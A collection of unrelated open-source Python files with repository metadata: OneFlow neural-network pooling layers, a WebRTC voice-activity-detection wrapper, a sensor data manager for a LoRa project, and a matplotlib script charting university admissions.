72fcee1493f195ec3bae74593e478750b54bd8d2 | 23,803 | py | Python | python/oneflow/compatible/single_client/nn/modules/pooling.py | wangyuyue/oneflow | 0a71c22fe8355392acc8dc0e301589faee4c4832 | ["Apache-2.0"] | 1 | 2021-09-13T02:34:53.000Z | 2021-09-13T02:34:53.000Z | python/oneflow/compatible/single_client/nn/modules/pooling.py | wangyuyue/oneflow | 0a71c22fe8355392acc8dc0e301589faee4c4832 | ["Apache-2.0"] | null | null | null | python/oneflow/compatible/single_client/nn/modules/pooling.py | wangyuyue/oneflow | 0a71c22fe8355392acc8dc0e301589faee4c4832 | ["Apache-2.0"] | 1 | 2021-01-17T03:34:39.000Z | 2021-01-17T03:34:39.000Z |
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import Optional
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client.nn.common_types import (
_size_1_t,
_size_2_t,
_size_3_t,
)
from oneflow.compatible.single_client.nn.module import Module
from oneflow.compatible.single_client.nn.modules.utils import _pair, _single, _triple
from oneflow.compatible.single_client.ops.nn_ops import (
calc_pool_padding,
get_dhw_offset,
)
class AvgPool1d(Module):
"""Applies a 1D average pooling over an input signal composed of several input planes.
    In the simplest case, the output value of the layer with input size :math:`(N, C, L)`,
    output :math:`(N, C, L_{out})` and `kernel_size` :math:`k`
    can be precisely described as:
    .. math::
        out(N_i, C_j, l) = \\frac{1}{k} \\sum_{m=0}^{k-1}
                            input(N_i, C_j, stride \\times l + m)
If padding is non-zero, then the input is implicitly zero-padded on both sides for padding number of points.
The parameters kernel_size, stride, padding can each be an int or a one-element tuple.
Note:
When ceil_mode=True, sliding windows are allowed to go off-bounds if they start within the left padding or the
input. Sliding windows that would start in the right padded region are ignored.
Args:
kernel_size: the size of the window.
strides: the stride of the window. Default value is kernel_size.
padding: implicit zero padding to be added on both sides.
ceil_mode: when True, will use ceil instead of floor to compute the output shape.
count_include_pad: when True, will include the zero-padding in the averaging calculation.
# TODO: fix cuDNN bugs in pooling_1d
"""
def __init__(
self,
kernel_size: _size_1_t,
stride: Optional[_size_1_t] = None,
padding: _size_1_t = 0,
ceil_mode: bool = False,
count_include_pad: Optional[bool] = None,
name: Optional[str] = None,
):
raise NotImplementedError
class AvgPool2d(Module):
"""Performs the 2d-average pooling on the input.
In the simplest case, the output value of the layer with input size :math:`(N, C, H, W)`,
output :math:`(N, C, H_{out}, W_{out})` and `kernel_size` :math:`(kH, kW)`
can be precisely described as:
.. math::
out(N_i, C_j, h, w) = \\frac{1}{kH * kW} \\sum_{m=0}^{kH-1} \\sum_{n=0}^{kW-1}
input(N_i, C_j, stride[0] \\times h + m, stride[1] \\times w + n)
Args:
kernel_size (Union[int, Tuple[int, int]]): An int or list of ints that has length 1, 2. The size of the window for each dimension of the input Tensor.
strides (Union[int, Tuple[int, int]]): An int or list of ints that has length 1, 2. The stride of the sliding window for each dimension of the input Tensor.
padding (Tuple[int, int]): An int or list of ints that has length 1, 2. Implicit zero padding to be added on both sides.
ceil_mode (bool, default to False): When True, will use ceil instead of floor to compute the output shape.
For example:
.. code-block:: python
import oneflow.compatible.single_client.experimental as flow
import numpy as np
of_avgpool2d = flow.nn.AvgPool2d(
kernel_size=(3, 2),
padding=0,
stride=(2, 1),
)
x = flow.Tensor(shape=(1, 1, 10, 10))
of_y = of_avgpool2d(x)
"""
def __init__(
self,
kernel_size: _size_2_t,
stride: Optional[_size_2_t] = None,
padding: _size_2_t = 0,
ceil_mode: bool = False,
count_include_pad: Optional[bool] = None,
divisor_override: Optional[int] = None,
name: Optional[str] = None,
):
super().__init__()
self.kernel_size = _pair(kernel_size)
        self.stride = _pair(stride) if stride is not None else self.kernel_size
assert isinstance(padding, int) or isinstance(
padding, tuple
), "padding can only int int or tuple of 2 ints."
padding = _pair(padding)
padding = [0, 0, *padding]
assert count_include_pad is None, "count_include_pad not supported yet"
assert divisor_override is None, "divisor_override not supported yet"
self._channel_pos = "channels_first"
(self._padding_type, _pads_list) = calc_pool_padding(
padding, get_dhw_offset(self._channel_pos), 2
)
self._padding_before = [pad[0] for pad in _pads_list]
self._padding_after = [pad[1] for pad in _pads_list]
self.ceil_mode = ceil_mode
def forward(self, x):
res = flow.F.avg_pool_2d(
x,
kernel_size=self.kernel_size,
stride=self.stride,
padding=self._padding_type,
padding_before=self._padding_before,
padding_after=self._padding_after,
ceil_mode=self.ceil_mode,
data_format=self._channel_pos,
)
return res
class AvgPool3d(Module):
"""Applies a 3D average pooling over an input signal composed of several input planes.
In the simplest case, the output value of the layer with input size :math:`(N, C, D, H, W)`,
output :math:`(N, C, D_{out}, H_{out}, W_{out})` and `kernel_size` :math:`(kD, kH, kW)`
can be precisely described as:
.. math::
out(N_i, C_j, d, h, w) = \\frac{1}{kD * kH * kW } \\sum_{k=0}^{kD-1} \\sum_{m=0}^{kH-1} \\sum_{n=0}^{kW-1}
input(N_i, C_j, stride[0] \\times d + k, stride[1] \\times h + m, stride[2] \\times w + n)
If padding is non-zero, then the input is implicitly zero-padded on all three sides for padding number of points.
Note:
When ceil_mode=True, sliding windows are allowed to go off-bounds if they start within the left padding or the
input. Sliding windows that would start in the right padded region are ignored.
Args:
kernel_size: the size of the window.
strides: the stride of the window. Default value is kernel_size.
padding: implicit zero padding to be added on all three sides.
ceil_mode: when True, will use ceil instead of floor to compute the output shape.
count_include_pad: when True, will include the zero-padding in the averaging calculation.
divisor_override: if specified, it will be used as divisor, otherwise kernel_size will be used.
Shape:
- Input: :math:`(N, C, D_{in}, H_{in}, W_{in})`
- Output: :math:`(N, C, D_{out}, H_{out}, W_{out})`, where
.. math::
D_{out} = \\left\\lfloor\\frac{D_{in} + 2 \\times \\text{padding}[0] - \\text{kernel_size}[0]}{\\text{stride}[0]} + 1\\right\\rfloor
.. math::
H_{out} = \\left\\lfloor\\frac{H_{in} + 2 \\times \\text{padding}[1] - \\text{kernel_size}[1]}{\\text{stride}[1]} + 1\\right\\rfloor
.. math::
W_{out} = \\left\\lfloor\\frac{W_{in} + 2 \\times \\text{padding}[2] - \\text{kernel_size}[2]}{\\text{stride}[2]} + 1\\right\\rfloor
For example:
.. code-block:: python
>>> import oneflow.compatible.single_client.experimental as flow
>>> import numpy as np
>>> flow.enable_eager_execution()
>>> inputarr = np.random.randn(9, 7, 11, 32, 20)
>>> of_avgpool3d = flow.nn.AvgPool3d(kernel_size=(2,2,2),padding=(0,0,0),stride=(1,1,1),)
>>> x = flow.Tensor(inputarr)
>>> y = of_avgpool3d(x)
"""
def __init__(
self,
kernel_size: _size_3_t,
stride: Optional[_size_3_t] = None,
padding: _size_3_t = 0,
ceil_mode: bool = False,
count_include_pad: Optional[bool] = None,
divisor_override: Optional[int] = None,
):
super().__init__()
        kernel_size = _triple(kernel_size)
        stride = _triple(stride) if stride is not None else kernel_size
        assert isinstance(padding, int) or isinstance(
            padding, tuple
        ), "padding can only be an int or a tuple of 3 ints."
        padding = _triple(padding)
        assert tuple(padding) == (0, 0, 0), "padding>0 not supported yet"
        padding = [0, 0, *padding]
assert count_include_pad is None, "count_include_pad not supported yet"
assert divisor_override is None, "divisor_override not supported yet"
_channel_pos = "channels_first"
(_padding_type, _pads_list) = calc_pool_padding(
padding, get_dhw_offset(_channel_pos), 3
)
_padding_before = [pad[0] for pad in _pads_list]
_padding_after = [pad[1] for pad in _pads_list]
self._op = (
flow.builtin_op("avg_pool_3d")
.Attr("data_format", _channel_pos)
.Attr("pool_size", kernel_size)
.Attr("strides", stride)
.Attr("ceil_mode", ceil_mode)
.Attr("padding", _padding_type)
.Attr("padding_before", _padding_before)
.Attr("padding_after", _padding_after)
.Input("x")
.Output("y")
.Build()
)
def forward(self, x):
res = self._op(x)[0]
return res
class MaxPool1d(Module):
"""The interface is consistent with PyTorch.
The documentation is referenced from: https://pytorch.org/docs/stable/generated/torch.nn.MaxPool1d.html#torch.nn.MaxPool1d
Applies a 1D max pooling over an input signal composed of several input planes.
In the simplest case, the output value of the layer with input size :math:`(N, C, L)`
and output :math:`(N, C, L_{out})` can be precisely described as:
.. math::
out(N_i, C_j, k) = \\max_{m=0, \\ldots, \\text{kernel\\_size} - 1}
input(N_i, C_j, stride \\times k + m)
If :attr:`padding` is non-zero, then the input is implicitly padded with minimum value on both sides
for :attr:`padding` number of points. :attr:`dilation` is the stride between the elements within the
sliding window. This `link`_ has a nice visualization of the pooling parameters.
Note:
When ceil_mode=True, sliding windows are allowed to go off-bounds if they start within the left padding
or the input. Sliding windows that would start in the right padded region are ignored.
Args:
kernel_size: The size of the sliding window, must be > 0.
stride: The stride of the sliding window, must be > 0. Default value is :attr:`kernel_size`.
padding: Implicit negative infinity padding to be added on both sides, must be >= 0 and <= kernel_size / 2.
dilation: The stride between elements within a sliding window, must be > 0.
return_indices: If ``True``, will return the argmax along with the max values.
Useful for :class:`torch.nn.MaxUnpool1d` later
ceil_mode: If ``True``, will use `ceil` instead of `floor` to compute the output shape. This
ensures that every element in the input tensor is covered by a sliding window.
Shape:
- Input: :math:`(N, C, L_{in})`
- Output: :math:`(N, C, L_{out})`, where
.. math::
L_{out} = \\left\\lfloor \\frac{L_{in} + 2 \\times \\text{padding} - \\text{dilation}
\\times (\\text{kernel_size} - 1) - 1}{\\text{stride}} + 1\\right\\rfloor
"""
def __init__(
self,
kernel_size: _size_1_t,
stride: Optional[_size_1_t] = None,
padding: _size_1_t = 0,
dilation: _size_1_t = 1,
return_indices: bool = False,
ceil_mode: bool = False,
):
raise NotImplementedError
class MaxPool2d(Module):
"""The interface is consistent with PyTorch.
The documentation is referenced from: https://pytorch.org/docs/stable/generated/torch.nn.MaxPool2d.html#torch.nn.MaxPool2d
Applies a 2D max pooling over an input signal composed of several input planes.
In the simplest case, the output value of the layer with input size :math:`(N, C, H, W)`,
output :math:`(N, C, H_{out}, W_{out})` and :attr:`kernel_size` :math:`(kH, kW)`
can be precisely described as:
.. math::
\\begin{aligned}
out(N_i, C_j, h, w) ={} & \\max_{m=0, \\ldots, kH-1} \\max_{n=0, \\ldots, kW-1} \\\\
& \\text{input}(N_i, C_j, \\text{stride[0]} \\times h + m,
\\text{stride[1]} \\times w + n)
\\end{aligned}
    If :attr:`padding` is non-zero, then the input is implicitly padded with the minimum value on both sides
for :attr:`padding` number of points. :attr:`dilation` controls the spacing between the kernel points.
It is harder to describe, but this `link`_ has a nice visualization of what :attr:`dilation` does.
Note:
When ceil_mode=True, sliding windows are allowed to go off-bounds if they start within the left padding
or the input. Sliding windows that would start in the right padded region are ignored.
The parameters :attr:`kernel_size`, :attr:`stride`, :attr:`padding`, :attr:`dilation` can either be:
- a single ``int`` -- in which case the same value is used for the height and width dimension
- a ``tuple`` of two ints -- in which case, the first `int` is used for the height dimension,
and the second `int` for the width dimension
Args:
kernel_size: the size of the window to take a max over
stride: the stride of the window. Default value is :attr:`kernel_size`
padding: implicit minimum value padding to be added on both sides
dilation: a parameter that controls the stride of elements in the window
return_indices: if ``True``, will return the max indices along with the outputs.
Useful for :class:`torch.nn.MaxUnpool2d` later
ceil_mode: when True, will use `ceil` instead of `floor` to compute the output shape
Shape:
- Input: :math:`(N, C, H_{in}, W_{in})`
- Output: :math:`(N, C, H_{out}, W_{out})`, where
.. math::
H_{out} = \\left\\lfloor\\frac{H_{in} + 2 * \\text{padding[0]} - \\text{dilation[0]}
\\times (\\text{kernel_size[0]} - 1) - 1}{\\text{stride[0]}} + 1\\right\\rfloor
.. math::
W_{out} = \\left\\lfloor\\frac{W_{in} + 2 * \\text{padding[1]} - \\text{dilation[1]}
\\times (\\text{kernel_size[1]} - 1) - 1}{\\text{stride[1]}} + 1\\right\\rfloor
For example:
.. code-block:: python
>>> import oneflow.compatible.single_client.experimental as flow
>>> import numpy as np
>>> flow.enable_eager_execution()
>>> kernel_size, stride, padding = (3, 3), (1, 1), (1, 2)
>>> m = flow.nn.MaxPool2d(kernel_size, stride, padding)
>>> np.random.seed(0)
>>> x = flow.Tensor(np.random.rand(1, 1, 5, 3))
>>> y = m(x)
>>> y #doctest: +ELLIPSIS
tensor([[[[0.5488, 0.7152, 0.7152, 0.7152, 0.6459],
...
[0.568 , 0.9256, 0.9256, 0.9256, 0.5289]]]], dtype=oneflow.float32)
>>> kernel_size, stride, padding = (2, 3), (4, 5), (1, 2)
>>> m = flow.nn.MaxPool2d(kernel_size, stride, padding)
>>> x = flow.Tensor(np.random.randn(9, 7, 32, 20))
>>> y = m(x)
>>> y.size()
flow.Size([9, 7, 9, 5])
"""
def __init__(
self,
kernel_size: _size_2_t,
stride: Optional[_size_2_t] = None,
padding: _size_2_t = 0,
dilation: _size_2_t = 1,
return_indices: bool = False,
ceil_mode: bool = False,
):
super().__init__()
self.kernel_size = _pair(kernel_size)
        self.strides = _pair(stride) if stride is not None else self.kernel_size
data_format = "NCHW"
self.channel_pos = (
"channels_last" if data_format == "NHWC" else "channels_first"
)
assert return_indices is False, "Only support return_indices==False for now!"
assert dilation == 1 or dilation == (1, 1), "Only support dilation==1 for now!"
padding = _pair(padding)
if len(padding) == 2:
if data_format == "NCHW":
padding = (0, 0, padding[0], padding[1])
else:
raise ValueError("error padding param!")
else:
raise ValueError("error padding param!")
(self.padding_type, pads_list) = calc_pool_padding(
padding, get_dhw_offset(self.channel_pos), 2
)
self.padding_before = [pad[0] for pad in pads_list]
self.padding_after = [pad[1] for pad in pads_list]
self.ceil_mode = ceil_mode
def forward(self, x):
return flow.F.max_pool_2d(
x,
kernel_size=self.kernel_size,
stride=self.strides,
padding=self.padding_type,
padding_before=self.padding_before,
padding_after=self.padding_after,
ceil_mode=self.ceil_mode,
data_format=self.channel_pos,
)
class MaxPool3d(Module):
"""The interface is consistent with PyTorch.
The documentation is referenced from: https://pytorch.org/docs/stable/generated/torch.nn.MaxPool3d.html#torch.nn.MaxPool3d
Applies a 3D max pooling over an input signal composed of several input planes.
In the simplest case, the output value of the layer with input size :math:`(N, C, D, H, W)`,
output :math:`(N, C, D_{out}, H_{out}, W_{out})` and :attr:`kernel_size` :math:`(kD, kH, kW)`
can be precisely described as:
.. math::
\\begin{aligned}
\\text{out}(N_i, C_j, d, h, w) ={} & \\max_{k=0, \\ldots, kD-1} \\max_{m=0, \\ldots, kH-1} \\max_{n=0, \\ldots, kW-1} \\\\
& \\text{input}(N_i, C_j, \\text{stride[0]} \\times d + k,
\\text{stride[1]} \\times h + m, \\text{stride[2]} \\times w + n)
\\end{aligned}
    If :attr:`padding` is non-zero, then the input is implicitly padded with the minimum value on both sides
for :attr:`padding` number of points. :attr:`dilation` controls the spacing between the kernel points.
It is harder to describe, but this `link`_ has a nice visualization of what :attr:`dilation` does.
Note:
When ceil_mode=True, sliding windows are allowed to go off-bounds if they start within the left padding
or the input. Sliding windows that would start in the right padded region are ignored.
The parameters :attr:`kernel_size`, :attr:`stride`, :attr:`padding`, :attr:`dilation` can either be:
- a single ``int`` -- in which case the same value is used for the depth, height and width dimension
- a ``tuple`` of three ints -- in which case, the first `int` is used for the depth dimension,
the second `int` for the height dimension and the third `int` for the width dimension
Args:
kernel_size: the size of the window to take a max over
stride: the stride of the window. Default value is :attr:`kernel_size`
padding: implicit minimum value padding to be added on all three sides
dilation: a parameter that controls the stride of elements in the window
return_indices: if ``True``, will return the max indices along with the outputs.
Useful for :class:`torch.nn.MaxUnpool3d` later
ceil_mode: when True, will use `ceil` instead of `floor` to compute the output shape
Shape:
- Input: :math:`(N, C, D_{in}, H_{in}, W_{in})`
- Output: :math:`(N, C, D_{out}, H_{out}, W_{out})`, where
.. math::
D_{out} = \\left\\lfloor\\frac{D_{in} + 2 \\times \\text{padding}[0] - \\text{dilation}[0] \\times
(\\text{kernel_size}[0] - 1) - 1}{\\text{stride}[0]} + 1\\right\\rfloor
.. math::
H_{out} = \\left\\lfloor\\frac{H_{in} + 2 \\times \\text{padding}[1] - \\text{dilation}[1] \\times
(\\text{kernel_size}[1] - 1) - 1}{\\text{stride}[1]} + 1\\right\\rfloor
.. math::
W_{out} = \\left\\lfloor\\frac{W_{in} + 2 \\times \\text{padding}[2] - \\text{dilation}[2] \\times
(\\text{kernel_size}[2] - 1) - 1}{\\text{stride}[2]} + 1\\right\\rfloor
For example:
.. code-block:: python
>>> import oneflow.compatible.single_client.experimental as flow
>>> import numpy as np
>>> flow.enable_eager_execution()
>>> kernel_size, stride, padding = (3, 3, 3), (1, 1, 1), (1, 1, 2)
>>> m = flow.nn.MaxPool3d(kernel_size, stride, padding)
>>> np.random.seed(0)
>>> x = flow.Tensor(np.random.rand(1, 1, 3, 5, 3))
>>> y = m(x)
>>> y #doctest: +ELLIPSIS
tensor([[[[[0.7782, 0.87 , 0.9786, 0.9786, 0.9786],
...
[0.9447, 0.9447, 0.9447, 0.6668, 0.6668]]]]], dtype=oneflow.float32)
>>> kernel_size, stride, padding = (2, 2, 3), (3, 4, 5), (2, 1, 2)
>>> m = flow.nn.MaxPool3d(kernel_size, stride, padding)
>>> x = flow.Tensor(np.random.randn(9, 7, 11, 32, 20))
>>> y = m(x)
>>> y.size()
flow.Size([9, 7, 5, 9, 5])
"""
def __init__(
self,
kernel_size: _size_3_t,
stride: Optional[_size_3_t] = None,
padding: _size_3_t = 0,
dilation: _size_3_t = 1,
return_indices: bool = False,
ceil_mode: bool = False,
):
super().__init__()
kernel_size = _triple(kernel_size)
strides = _triple(stride) if stride is not None else kernel_size
data_format = "NCDHW"
channel_pos = "channels_last" if data_format == "NDHWC" else "channels_first"
assert return_indices is False, "Only support return_indices==False for now!"
assert dilation == 1 or dilation == (
1,
1,
1,
), "Only support dilation==1 for now!"
padding = _triple(padding)
if len(padding) == 3:
if data_format == "NCDHW":
padding = (0, 0, padding[0], padding[1], padding[2])
else:
raise ValueError("error padding param!")
else:
raise ValueError("error padding param!")
(padding_type, pads_list) = calc_pool_padding(
padding, get_dhw_offset(channel_pos), 3
)
padding_before = [pad[0] for pad in pads_list]
padding_after = [pad[1] for pad in pads_list]
self._op = (
flow.builtin_op("max_pool_3d")
.Attr("data_format", channel_pos)
.Attr("pool_size", kernel_size)
.Attr("strides", strides)
.Attr("ceil_mode", ceil_mode)
.Attr("padding", padding_type)
.Attr("padding_before", padding_before)
.Attr("padding_after", padding_after)
.Input("x")
.Output("y")
.Build()
)
def forward(self, x):
return self._op(x)[0]
if __name__ == "__main__":
import doctest
doctest.testmod(raise_on_error=True)
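    # A hedged shape check (not in the original file), applying the AvgPool2d
    # docstring formula: kernel_size=(3, 2), stride=(2, 1), padding=0 on a
    # (1, 1, 10, 10) input gives H_out = (10 - 3)//2 + 1 = 4 and
    # W_out = (10 - 2)//1 + 1 = 9, i.e. an output of shape (1, 1, 4, 9).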
| 42.203901 | 164 | 0.60026 |
f40d32e548139f9fb4eba3fe304297507dda91c5 | 6,217 | py | Python | python/en/archive/topics/temp/audio/voice_activity_detection/src/webrt_vad.py | aimldl/coding | 70ddbfaa454ab92fd072ee8dc614ecc330b34a70 | ["MIT"] | null | null | null | python/en/archive/topics/temp/audio/voice_activity_detection/src/webrt_vad.py | aimldl/coding | 70ddbfaa454ab92fd072ee8dc614ecc330b34a70 | ["MIT"] | null | null | null | python/en/archive/topics/temp/audio/voice_activity_detection/src/webrt_vad.py | aimldl/coding | 70ddbfaa454ab92fd072ee8dc614ecc330b34a70 | ["MIT"] | null | null | null |
'''
webrt_vad.py
Prerequisite:
+ Install webrtcvad
$ pip install webrtcvad
+ Install other packages such as numpy, matplotlib, and scipy
$ pip install package_name
fs sampling rate
py-webrtcvad, https://github.com/wiseman/py-webrtcvad/
Voice activity detection example, https://www.kaggle.com/holzner/voice-activity-detection-example
[This example didn't run, so I had to fix some parts.]
'''
import os
import numpy as np
import matplotlib.pyplot as plt
import webrtcvad
import struct
import IPython.display as ipd
from scipy.io import wavfile
class WebRtVad:
# This class is assumed to be a singleton.
# Constructor
def __init__( self ):
self.vad = webrtcvad.Vad()
self.vad.set_mode(3)
self.configure()
def configure( self ):
self.window_duration = 0.03 # duration in seconds
self.bytes_per_sample = 2
def test_run( self ):
# Read in the input .wav file
#file = './english-0.wav'
if __name__ == '__main__':
file = './audio_files/english-0.wav'
else:
file = './vad/audio_files/english-0.wav'
samples, fs = self.read_wav( file )
num_samples = len(samples) # 57920
samples_per_window = int( self.window_duration * fs + 0.5 )
# Verify the input file
self.play_audio( samples, fs )
self.plot( samples, title='Input Signal' )
norm_samples, y_max = self.normalize( samples )
self.play_audio( norm_samples, fs )
self.plot( norm_samples, title='Normalized Input Signal' )
# Apply VAD
# CAUTION:
# samples shouldn't be normalized because the format h is short int.
# So pack expects a sequence of integers as the input.
# Otherwise,
# *** struct.error: required argument is not an integer
raw_samples = struct.pack( "%dh" % len(samples), *samples)
segments = self.get_segments( raw_samples, num_samples, fs, samples_per_window )
self.plot_segments( norm_samples, segments )
def read_wav( self, file ):
fs, samples = wavfile.read( file )
return samples, fs
def normalize( self, samples ):
'''
Peak normalization of the input audio signal
i.e. normalize the input audio signal or data with the maximum value
'''
y_max = max( abs(samples) )
norm_samples = samples / y_max
return norm_samples, y_max
def play_audio( self, samples, fs ):
ipd.Audio( samples, rate=fs )
def plot( self, samples, title='Input File' ):
plt.figure(figsize = (10,7))
plt.plot( samples )
plt.grid()
plt.title( title )
plt.xlabel( 'sample' )
plt.ylabel( 'Amplitude' )
def get_segments( self, raw_samples, num_samples, fs, samples_per_window ):
'''
segment_dict is a dictionary of {start, stop, is_speech} for a window.
Each window's sample starts from start and ends at stop.
Byte-wise, a window starts from from_ and ends at to.
segments_dicts is a collection of all the windows.
'''
segments_dicts = []
        for start in np.arange(0, num_samples, samples_per_window):
            from_ = start * self.bytes_per_sample
            stop = min( start + samples_per_window, num_samples ) # For the last frame
            if stop - start < samples_per_window:
                # webrtcvad accepts only full 10/20/30 ms frames; skip the
                # trailing partial window, which would otherwise raise
                # "Error while processing frame".
                break
            to = stop * self.bytes_per_sample
            this_window = raw_samples[ from_:to ]
            is_speech = self.vad.is_speech( this_window, sample_rate=fs )
            segment_dict = dict( start=start, stop=stop, is_speech=is_speech)
            segments_dicts.append( segment_dict )
        return segments_dicts
def plot_segments( self, samples, segments ):
self.plot( samples, 'Speech Samples' )
peak_value = max( abs(samples) )
# Overlay the speech segments over the input waveform
for segment in segments:
if segment['is_speech']:
x = [ segment['start'], segment['stop'] - 1]
y = [ peak_value, peak_value ]
#y = [ 1, 1 ]
# plot segment identifed as speech
plt.plot(x, y, color = 'orange')
plt.show()
def run( self, input_, num_samples, format_='samples' ):
if format_ == 'file':
assert isinstance( input_, str ), 'When the format is file, input_ must be a string.'
# Read in the input .wav file
file = input_
#file = './english-0.wav'
#file = '../audio_files/english-0.wav'
samples, fs = self.read_wav( file )
elif format_ == 'samples':
# assert isinstance( input_[0], numpy.ndarray ) numpy.ndarray
assert isinstance( input_[1], int ), 'input_[1] must be sampling rate which is an integer.'
samples = input_[0]
fs = input_[1]
data_type = samples.dtype.name
if data_type == 'float64':
samples = samples.astype(int)
# Note samples must be integers ('int16'?)
samples_per_window = int( self.window_duration * fs + 0.5 )
# Verify the input file
# if self.config.debug:
# self.play_audio( samples, fs )
# self.plot( samples, title='Input Signal' )
# self.play_audio( norm_samples, fs )
# self.plot( norm_samples, title='Normalized Input Signal' )
# Apply VAD
# CAUTION:
# samples shouldn't be normalized because the format h is short int.
# So pack expects a sequence of integers as the input.
# Otherwise,
# *** struct.error: required argument is not an integer
raw_samples = struct.pack( "%dh" % num_samples, *samples)
segments = self.get_segments( raw_samples, num_samples, fs, samples_per_window )
self.plot_segments( samples, segments )
if __name__ == '__main__':
vad = WebRtVad()
vad.test_run()
| 36.356725 | 103 | 0.593695 |
be2f8c45e2d5ae5d90af28ed25e26cb678b1ec6a | 2,391 | py | Python | 20-fs-ias-lec/groups/09-loraSense/SenseLink/LoRaSense - Interface/sensui/SensorManager.py | Kyrus1999/BACnet | 5be8e1377252166041bcd0b066cce5b92b077d06 | ["MIT"] | 8 | 2020-03-17T21:12:18.000Z | 2021-12-12T15:55:54.000Z | 20-fs-ias-lec/groups/09-loraSense/SenseLink/LoRaSense - Interface/sensui/SensorManager.py | Kyrus1999/BACnet | 5be8e1377252166041bcd0b066cce5b92b077d06 | ["MIT"] | 2 | 2021-07-19T06:18:43.000Z | 2022-02-10T12:17:58.000Z | 20-fs-ias-lec/groups/09-loraSense/SenseLink/LoRaSense - Interface/sensui/SensorManager.py | Kyrus1999/BACnet | 5be8e1377252166041bcd0b066cce5b92b077d06 | ["MIT"] | 25 | 2020-03-20T09:32:45.000Z | 2021-07-18T18:12:59.000Z |
class SensorManager:
class Sensor:
def __init__(self, id, name, sType, unit):
self.id = id
self.name = name
self.sType = sType
self.unit = unit
    sensorTypes = {
        "T_celcius": Sensor("T_celcius", "Temperature", "T", "°C"),
        "P_hPa": Sensor("P_hPa", "Air pressure", "P", "hPa"),
        "rH": Sensor("rH", "Relative humidity", "rH", "%"),
        "J_lumen": Sensor("J_lumen", "Luminous flux", "J", "%")
    }
INDEX_TIMESTAMP = 0
INDEX_VALUE = 1
def __init__(self, callbackDataUpdated, callbackNodesUpdated):
self.__callbackDataUpdated = callbackDataUpdated
self.__callbackNodesUpdated = callbackNodesUpdated
'''
values = {
nodeId = {
sensorId = [
[t1, t2, t3],
[v1, v2, v3]
]
}
}
'''
self.__values = {}
@staticmethod
def getUnit(sensorId):
if sensorId in SensorManager.sensorTypes:
return SensorManager.sensorTypes[sensorId].unit
def addData(self, nodeId, sensorId, value, timestamp):
if value is None or timestamp is None:
return
if nodeId not in self.__values:
self.__values[nodeId] = {sensorId: [[timestamp], [value]]}
self.__callbackNodesUpdated(nodeId)
elif sensorId not in self.__values[nodeId]:
self.__values[nodeId][sensorId] = [[timestamp], [value]]
else:
self.__values[nodeId][sensorId][SensorManager.INDEX_TIMESTAMP].append(timestamp)
self.__values[nodeId][sensorId][SensorManager.INDEX_VALUE].append(value)
# TODO: Fire event
self.__callbackDataUpdated(nodeId, sensorId)
def dataReference(self, nodeId, sensorId):
if nodeId not in self.__values:
data = [[], []]
self.__values[nodeId] = {sensorId: data}
elif sensorId not in self.__values[nodeId]:
data = [[], []]
self.__values[nodeId][sensorId] = data
else:
data = self.__values[nodeId][sensorId]
return data
def getData(self, nodeId, sensorId):
if nodeId not in self.__values or sensorId not in self.__values[nodeId]:
return None
return self.__values[nodeId][sensorId]
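# A hedged usage sketch (not in the original file), wiring no-op callbacks:
#   sm = SensorManager(lambda node, sensor: None, lambda node: None)
#   sm.addData("node1", "T_celcius", 21.5, 1591712400)
#   sm.getData("node1", "T_celcius")   # -> [[1591712400], [21.5]]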
| 31.051948 | 92 | 0.557926 |
be990e57313210c67d9f706a8582347597f1840b | 2,078 | py | Python | BigData_exp/exp3/exp3/my_pie.py | DolorHunter/hfut-exp-archived | c67e26c1f4fba550c8974eaba10dfa302b928868 | ["BSD-2-Clause"] | 12 | 2020-12-07T05:49:05.000Z | 2022-03-25T09:09:36.000Z | BigData_exp/exp3/exp3/my_pie.py | DolorHunter/hfut-exp | c67e26c1f4fba550c8974eaba10dfa302b928868 | ["BSD-2-Clause"] | null | null | null | BigData_exp/exp3/exp3/my_pie.py | DolorHunter/hfut-exp | c67e26c1f4fba550c8974eaba10dfa302b928868 | ["BSD-2-Clause"] | 1 | 2021-01-08T08:53:53.000Z | 2021-01-08T08:53:53.000Z |
from matplotlib import pyplot as plt
from matplotlib import cm
import numpy as np
import my_count
plt.rcParams['font.sans-serif'] = ['SimHei']  # use SimHei so Chinese labels render correctly
def school_pie():
labels = []
sizes = []
othersize = 0
    explode = (0.05,) + (0,) * 100  # 101 slices: pull only the largest one out
    # enumerate replaces zip(..., range(999)), which silently dropped any entry past 999
    for i, (school, times) in enumerate(my_count.schooltimes_list):
if i < 100:
labels.append(school)
sizes.append(times)
else:
othersize += times
labels.append('其他')
sizes.append(othersize)
colors = cm.rainbow(1 - np.arange(len(sizes)) / len(sizes))
plt.figure(figsize=(35, 25))
plt.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%', colors=colors)
plt.title('2017年双十学子高考录学校分布', fontsize='large', fontweight='bold')
plt.legend(loc='upper right')
plt.axis('equal')
plt.savefig('school_pie.png')
plt.show()
def schooltypes_pie():
labels = []
sizes = []
explode = (0.05, 0, 0, 0, 0, 0, 0, 0, 0)
for (schooltypes, times) in my_count.schooltypestimes_list:
labels.append(schooltypes)
sizes.append(times)
colors = cm.rainbow(1 - np.arange(len(sizes)) / len(sizes))
plt.figure(figsize=(20, 18))
plt.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%', colors=colors)
plt.title('2017年双十学子高考录学校类型分布', fontsize='large', fontweight='bold')
plt.legend(loc='upper left')
plt.axis('equal')
plt.savefig('schooltypes_pie.png')
plt.show()
def main():
my_count.count(my_count.schooltimes, my_count.schooltypestimes,
my_count.schooltimes_list, my_count.schooltypestimes_list)
school_pie()
schooltypes_pie()
if __name__ == '__main__':
main()
| 33.516129 | 84 | 0.567372 |
fe6233507e6954c640851a443fe9f83f5ba4fd02
| 462 |
py
|
Python
|
python/abc/abc_register.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/abc/abc_register.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/abc/abc_register.py
|
zeroam/TIL
|
